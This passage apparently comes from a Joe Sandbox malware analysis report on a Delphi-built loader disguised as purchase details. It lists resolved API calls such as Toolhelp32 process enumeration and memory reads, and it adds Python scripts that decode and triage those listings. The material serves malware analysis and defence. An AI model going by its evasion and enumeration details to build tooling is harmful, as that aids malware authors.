• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
• Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
• Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
• Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11
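Added example, not part of the Joe Sandbox report: a small Python triage script for the "APIs" lines in the entries above. It serves both the VirtualAlloc/VirtualFree entries (where the hex arguments encode MEM_COMMIT, MEM_COMMIT|MEM_TOP_DOWN, PAGE_READWRITE and MEM_RELEASE) and the GetProcAddress chain in this entry (sixteen Toolhelp32 exports resolved at runtime from a GetModuleHandleA("kernel32.dll") handle). The sample lines are copied from this section; the plugin prints "?" for arguments it could not recover and also prints stack slots beyond the API's real argument count, so the parser truncates to a per-API arity table. The arity table, the 1 MiB "large allocation" threshold and the Toolhelp32 export list are assumptions of this example, not something the report states; the flag constants are the documented Win32 values.

```python
import re

# Constructed sample input: API lines copied from the "APIs" sections of this
# report (Joe Sandbox IDA plugin output). "?" marks an argument the plugin could
# not recover; arguments past the API's real arity are stack residue.
SAMPLE = """\
VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
"""

LINE_RE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented Win32 constants (winnt.h / memoryapi.h), used to decode hex arguments.
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
              0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
              0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
             0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTE_MASK = 0xF0  # every PAGE_EXECUTE* value has one of these bits set

# Assumptions of this example: real argument count per API (everything beyond
# it is ignored), the size above which an allocation is reported, and the set
# of Toolhelp32 exports whose runtime resolution is worth flagging.
ARITY = {"VirtualAlloc": 4, "VirtualFree": 3, "GetProcAddress": 2, "GetModuleHandleA": 1}
LARGE_ALLOC = 1024 * 1024
TOOLHELP = {"CreateToolhelp32Snapshot", "Heap32ListFirst", "Heap32ListNext", "Heap32First",
            "Heap32Next", "Toolhelp32ReadProcessMemory", "Process32First", "Process32Next",
            "Process32FirstW", "Process32NextW", "Thread32First", "Thread32Next",
            "Module32First", "Module32Next", "Module32FirstW", "Module32NextW"}


def decode_flags(value, table):
    """Names of the table bits set in value, lowest bit first; leftover bits kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    rest = value & ~known
    if rest:
        names.append(f"0x{rest:X}")
    return names


def parse_arg(tok):
    """'?' -> None, 8 hex digits -> int, anything else -> the literal string (e.g. an export name)."""
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX32_RE.match(tok):
        return int(tok, 16)
    return tok


def parse_line(line):
    """One 'Api.MODULE(args), ref: addr' line -> dict, or None if it is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api = m.group("api")
    args = [parse_arg(t) for t in m.group("args").split(",")]
    return {"api": api, "module": m.group("mod"),
            "args": args[:ARITY.get(api, len(args))], "ref": int(m.group("ref"), 16)}


def _arg(args, i):
    return args[i] if i < len(args) else None


def triage(text):
    """Decode allocation flags and runtime-resolved imports; return findings an analyst would read first."""
    out = {"allocations": [], "frees": [], "resolved": [], "findings": []}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        a, ref = rec["args"], rec["ref"]
        if rec["api"] == "VirtualAlloc":
            size, atype, prot = _arg(a, 1), _arg(a, 2) or 0, _arg(a, 3) or 0
            out["allocations"].append({"ref": ref, "size": size,
                                       "alloc_type": decode_flags(atype, ALLOC_TYPE),
                                       "protect": decode_flags(prot, PAGE_PROT)})
            if size is not None and size >= LARGE_ALLOC:
                out["findings"].append(f"large allocation of 0x{size:X} bytes at 0x{ref:08X}")
            if prot & EXECUTE_MASK:
                out["findings"].append(f"executable memory requested at 0x{ref:08X}")
        elif rec["api"] == "VirtualFree":
            out["frees"].append({"ref": ref, "free_type": decode_flags(_arg(a, 2) or 0, FREE_TYPE)})
        elif rec["api"] == "GetProcAddress" and isinstance(_arg(a, 1), str):
            name = a[1]
            out["resolved"].append(name)
            if name in TOOLHELP:
                out["findings"].append(f"Toolhelp32 API {name} resolved at runtime at 0x{ref:08X}")
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run on the sample, the script reports one allocation of 0x140000 bytes as MEM_COMMIT / PAGE_READWRITE, a second allocation of unknown size as MEM_COMMIT|MEM_TOP_DOWN, a MEM_RELEASE free, and three Toolhelp32 exports resolved by name. No PAGE_EXECUTE* protection appears in these particular calls, so the executable-memory check stays quiet here; the same parser applied to the other entries of the report is where that check earns its keep.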
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
• lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                          • Opcode ID: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                                                                                                          • Instruction ID: 905c21ffe8dacf7c1d34f93c8a29a4feee15821d9281af3665a937d068eacd2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A418171E10619AFDB20DAE8CC88ADEB3BDEF48340FC445E5A658E7245E774DA448F90
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
• Instruction ID: 62d51a6d47bec3f5ff2a09b0e2781232562ec7bd0e096047ac09988cb12e3b6a
• Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
• Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90
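Reading the block above: the stack residue next to each call shows HKEY_CURRENT_USER (80000001) and HKEY_LOCAL_MACHINE (80000002) being opened with KEY_READ (000F0019) on Software\Borland\Locales and Software\Borland\Delphi\Locales, GetLocaleInfoA called with LCType 3 (LOCALE_SABBREVLANGNAME) into a 5-byte buffer, and LoadLibraryExA called with flags 2 (LOAD_LIBRARY_AS_DATAFILE). That is the Delphi run-time library's localized resource-module lookup, i.e. compiler boilerplate that every Delphi executable carries, consistent with a Delphi-built loader but not sample-specific logic. On its own this block does not show the locale-based geofencing check listed in the report's signatures; that needs to be located separately. The script below is an added example, not part of the Joe Sandbox report: it parses one function block in this plain-text shape, decodes the well-known constants, and flags the Delphi RTL locale pattern so blocks like this one can be filtered out when triaging a long listing. The sample block is the one above with indentation and link residue removed; the constant names are Windows SDK names; the classification heuristic and the function names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: the API and Similarity lines of the Borland Locales
# function block from the listing above, in the same plain-text shape (indent and
# "Download File" link residue removed). Raw string so the backslashes survive.
SAMPLE_BLOCK = r"""APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90
"""

# One API line: "• Name.MODULE(arg,arg,...), ref: ADDRESS"
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Any other bullet: "• Key: value"
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

# Windows SDK constants that appear verbatim in the argument lists.
HIVES = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}
KEY_READ = "000F0019"
LOCALE_SABBREVLANGNAME = "00000003"
LOAD_LIBRARY_AS_DATAFILE = 0x2


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # raw hex words, "?" or strings, exactly as printed
    ref: int          # call-site address


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # Similarity / dump-source key-values

    @property
    def string_ids(self) -> List[str]:
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    def calls(self, name: str) -> List[ApiCall]:
        return [c for c in self.apis if c.name == name]


def parse_block(text: str) -> FunctionBlock:
    """Parse one plain-text function block (APIs ... Similarity) into a FunctionBlock."""
    block = FunctionBlock()
    section: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line  # "APIs", "Strings", "Memory Dump Source", "Similarity", ...
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                block.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","), int(m["ref"], 16)))
                continue
        m = KV_RE.match(line)
        if m:
            block.meta[m["key"].strip()] = m["value"].strip()
    return block


def decode_hive(value: str) -> str:
    """Map a raw HKEY word such as 80000001 to its symbolic name (unchanged if unknown)."""
    return HIVES.get(value.upper(), value)


def registry_hives(block: FunctionBlock) -> set:
    """Hive handles seen anywhere in the block's stack residue."""
    return {HIVES[a.upper()] for c in block.apis for a in c.args if a.upper() in HIVES}


def is_delphi_locale_lookup(block: FunctionBlock) -> bool:
    """Heuristic (mine): Borland Locales key names, GetThreadLocale, GetLocaleInfoA with
    LOCALE_SABBREVLANGNAME and LoadLibraryExA with LOAD_LIBRARY_AS_DATAFILE in one block."""
    if not any(s.endswith(r"\Borland\Locales") for s in block.string_ids):
        return False
    if not block.calls("GetThreadLocale"):
        return False
    gli = block.calls("GetLocaleInfoA")
    if not gli or gli[0].args[1] != LOCALE_SABBREVLANGNAME:
        return False
    lle = block.calls("LoadLibraryExA")
    return bool(lle) and bool(int(lle[0].args[2], 16) & LOAD_LIBRARY_AS_DATAFILE)


def summarize(block: FunctionBlock) -> Dict[str, object]:
    """Compact triage record for one block, suitable for a JSON/CSV across a whole report."""
    stack_values = {a.upper() for c in block.apis for a in c.args}
    return {
        "apis": [c.name for c in block.apis],
        "refs": [f"{c.ref:08X}" for c in block.apis],
        "hives": sorted(registry_hives(block)),
        "key_read_seen": KEY_READ in stack_values,
        "delphi_locale_lookup": is_delphi_locale_lookup(block),
        "instruction_fuzzy_hash": block.meta.get("Instruction Fuzzy Hash"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_block(SAMPLE_BLOCK)), indent=2))
```

Run over a whole listing, split the text on each "APIs" header, feed every piece to parse_block and drop the blocks where is_delphi_locale_lookup is true; what is left is the set of functions worth an analyst's time. The heuristic checks the constant values as well as the API names so that a stager which merely imports GetLocaleInfoA is not misfiled as RTL boilerplate.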
APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
• Instruction ID: d1b01f7b7ecbb76af78f08fd2bddc1c0b1fe0ed451d2bfef95bd40ca9d615cc0
• Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
• Instruction Fuzzy Hash: A311C0B5A00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719A018B90
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
• Instruction ID: 2c0be3ec501732e34097e27960e5e910dff8cef024a2f81397b4d0f33d2c2540
• Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
• Instruction Fuzzy Hash: 0BE0D871B0021417D311A5589C80EF6736D9B58310F8042FABD15C7385EDE0AE848BE4
APIs
• GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
• Instruction ID: 912d13be15c01edde08139fe5364f143dfaa3b64daf79b64149dd6a9a1cbc3a1
• Opcode Fuzzy Hash: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
• Instruction Fuzzy Hash: E4F09D74A44301DFD350DF28D441A1AB7E9FF48B94F808DAAEA9887380E734D8148B52
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                          • Instruction ID: d587ccab2ad496537fb049c2a83c85784c3b01e094b5767708e64874f5dbb2d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD05EA670E2602AA210A15A2D84DBB5ADCCFC67A1F8040BAB988C6101D210DD07DAB1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                                                                          • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                          • Instruction ID: 52f9ffa0ec4a7821e472b7f731096f940d11e3a87547e6358cbbc9d5af24f82d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0A0124040582041854033180C0257431455921A20FC4878068F8402D0E91D01208093
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 379896293323490cab44bd705708037f6b70e4d15813b33b4a1e49e9f4173a34
                                                                                                                                                                                                                          • Instruction ID: a2f31a942fd55c1e613ba96036e2faff5583385f20bfae2476d077f9317e6f00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 379896293323490cab44bd705708037f6b70e4d15813b33b4a1e49e9f4173a34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3515B9284E7D18FC7638B7844B92D23FA0AE7722435E51DBC8D09F163E209990BDB51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
